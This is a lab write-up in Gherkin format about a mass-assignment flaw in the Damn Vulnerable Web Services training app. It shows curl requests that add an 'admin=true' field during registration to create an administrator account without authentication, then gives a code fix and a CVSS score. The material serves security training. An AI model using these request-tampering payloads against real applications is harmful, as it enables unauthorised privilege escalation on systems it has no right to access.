## Version 1.4.1
## language: en

Feature:
  TOE:
    Damn Vulnerable Web Services - dvws
  Category:
    Improperly Controlled Modification of Object Attributes
  Location:
    http://dvws/passphrasegen.html
  CWE:
    CWE-915: Improperly Controlled Modification Object Attributes
  Rule:
    REQ.321: https://fluidattacks.com/web/rules/321/
  Goal:
    Give admin privileges to a newly created account
  Recommendation:
    Whitelist non-sensitive fields

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows10       | 2004        |
    | Chromium        | 85.0        |
    | Virtualbox      | 6.1         |
    | Vagrant         | 2.2.10      |
    | Ubuntu          | 20.04       |
    | Docker          | 19.03       |
  TOE Information:
    Given I am accessing the followin url "http://dvws/"
    And DVWS-node is running within a docker container
    And is built with nodejs, angular and mongodb

  Scenario: Normal use case
    Given I access "http://dvws/"
    And I see a login form with a "Login" and "Register" buttons
    And I fill the form  with the following credentials
    """
    Username: peasent
    Password: SecretPassword
    """
    Then I click the button "Register"
    And I get back a message at the bottom of the page
    """
    peasent created successfully!
    """
    Then I click the button "Login"
    And I get redirected to my home page with a bunch of options
    And I see my username a the top of the home page
    """
    Welcome User: peasent
    The following areas can be accessed:
    Notes Area
    Admin Area
    Public Notes Search
    Passphrase Generator
    File Upload Area
    """
    Then I try to access the "Admin Area"
    And I get redirected back the home page
    And I can conclude "peasent" doesn't have access to the admin section

  Scenario: Static detection
    When I look at the code in "./routes/users.js"
    Then I can see the route "/v2/users"
    And I see this route calls "add()" when a POST request is received
    And I see "add()" is located at "./controllers/users.js"
    Then I inspect the code at "./controllers/users.js"
    And I find the function "add()"
    And I see the function is not whitelisting the appropiated values
    And is trusting in the input given by the user
    And I see It's being caused by "./controllers/users/js" from line 41 to 43
    """
    const user = new User(req.body); // document = instance of a model
    // TODO: We can hash the password here as well before we insert
    user.save((err, user) => {
    """
    Then I search for the "User" model-schema in "./models/users.js"
    """
    const userSchema = new Schema({
      username: {
        type: 'String',
        required: true,
        trim: true,
        unique: true
      },
      password: {
        type: 'String',
        required: true,
        trim: true
      },
      admin: {
        type: Boolean,
        default: false
      }
    });
    """
    And I can alter the "admin" property from the "User" object
    And I only need to add an extra parameter to the request body
    Then I can conclude user input is being binded directly to an object

  Scenario: Dynamic detection
    Given I access the following page "http://dvws/"
    Then I fill the form with the following credentials
    """
    Username: peasent01
    Password: SecretPassword
    """
    And I open the chrome dev tools in the "Network" tab
    Then I click the button "Register" in the web page
    And I search for the XHR request send to "/api/v2/users"
    Then I copy the request "as cURL (bash)"
    And I paste it into the terminal
    And add an extra parameter in the body of the request "isAdmin=true"
    """
    curl 'http://dvws/api/v2/users' \
      -H 'Connection: keep-alive' \
      -H 'Accept: application/json, text/plain, */*' \
      -H 'DNT: 1' \
      -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)' \
      -H 'Content-Type: application/x-www-form-urlencoded' \
      -H 'Accept-Language: en-US,en;q=0.9' \
      --data-raw 'username=peasent01&password=SecretPassword&isAdmin=true' \
      --compressed \
      --insecure
    """
    And I got a successfully response
    """
    {"status":201,"user":"peasent01",
     "password":"$2b$10$EsAGUj4drtt9pY31XF4hM.n0yj
                Mh1l3uvOxYg6GFwXn5CEi.lB.9S"}
    """
    Then I login to the web page with user "peasent01"
    And I check if I can access "http://dvws/admin.html"
    And I see I can't access the resource
    Then I try again but this time with
    """
    --data-raw 'username=peasent02&password=SecretPassword&admin=true' \
    """
    And I got a successfully response too
    """
    {"status":201,"user":"peasent02",
     "password":"$2b$10$EsAG414dUtt9pI81XF4hM.n0yj
                Mh1l3uvOxYg6GfhXn5CEi.lB.9S"}
    """
    Then I replicate the last steps of login and checking access but with curl
    And I prove this can be automated
    """
    token=`curl 'http://dvws/api/v2/login' \
    -H 'Accept: application/json, text/plain, */*' \
    --data-raw 'username=peasent02&password=SecretPassword'|
    jq -r .token`

    curl 'http://dvws/api/v2/users/checkadmin' \
    -H 'Accept: application/json, text/plain, */*' \
    -H 'X-Requested-With: XMLHttpRequest' -H 'Authorization: Bearer '$token''
    """
    And I got a successfully response
    """
    {"Success":"User is Admin Privileged",
     "AdminURL":"/api/v2/users","User":"peasent02"}
    """

  Scenario: Exploitation
    Given I'm in the linux terminal
    And I make a request to "/api/v2/users" with curl
    """
    curl -X POST -v http://dvws/api/v2/users --data-raw  \
    'username=peasent&password=SecretPassword&admin=true'
    """
    And I got a successfully response
    Then I login with it
    And I check if I have admin privileges
    """
    token=`curl 'http://dvws/api/v2/login' \
    -H 'Accept: application/json, text/plain, */*' \
    --data-raw 'username=peasent&password=SecretPassword'|
    jq -r .token`

    curl 'http://dvws/api/v2/users/checkadmin' \
    -H 'Accept: application/json, text/plain, */*' \
    -H 'X-Requested-With: XMLHttpRequest' -H 'Authorization: Bearer '$token''
    """
    And I'm an admin
    """
    {"Success":"User is Admin Privileged",
     "AdminURL":"/api/v2/users","User":"peasent"}
    """
    Then I can conclude I can create a user with administrative privileges
    And I can do it while being an unauthenticated user

  Scenario: Remediation
    Given the application is binding the user input directly to an Object
    Then I edit the function "add()" in "./controllers/users.js"
    And parse the user input individualy avoid a blind bindig of the user input
    """
    //const user = new User(req.body); // document = instance of a model
    // This section was modified by me.
    // Begin.
    const user = new User();
    user.username = req.body.username;
    user.password = req.body.password;
    // End.
    // TODO: We can hash the password here as well before we insert
    user.save((err, user) => {

    """
    Then the input supplied by a user is not being blindly binded to an object
    And I can't create an admin account by doing a "Mass Assignment" attack.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.2/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.8/10 (High) - E:F/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.2/10 (Critical) - CR:H/IR:H

  Scenario: Correlations
    No correlations have been found to this date {2020-09-16}
